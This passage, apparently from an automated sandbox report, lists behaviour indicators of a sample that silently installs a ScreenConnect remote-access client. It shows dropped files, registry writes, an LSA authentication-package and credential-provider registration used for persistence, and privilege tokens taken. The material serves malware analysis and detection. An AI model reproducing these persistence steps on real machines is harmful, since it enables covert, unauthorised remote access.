b14bMtVlP0cpw4z6xVig5oA4Brp71WnuLW%2fNaACTv0dPP5IyJF32BoNa6HhQjLWq4VH7sXzEB&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c=\"" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800320030006100650031003000310063006500660030006600310061006300660029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.config C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7829a0.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7829a1.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f7829a1.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{27FF5BC2-C647-2B99-83BE-DDEA87E94140}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\f7829a0.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2EDE.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI33B1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\MSI2D76.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f7829a3.msi C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\PackageCode = "2CB5FF72746C99B238EBDDAE789E1404" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404\Full C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F} C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\ = "ScreenConnect Client (20ae101cef0f1acf) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC\2CB5FF72746C99B238EBDDAE789E1404 C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductName = "ScreenConnect Client (20ae101cef0f1acf)" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductIcon = "C:\\Windows\\Installer\\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\PackageName = "setup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Version = "402718729" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
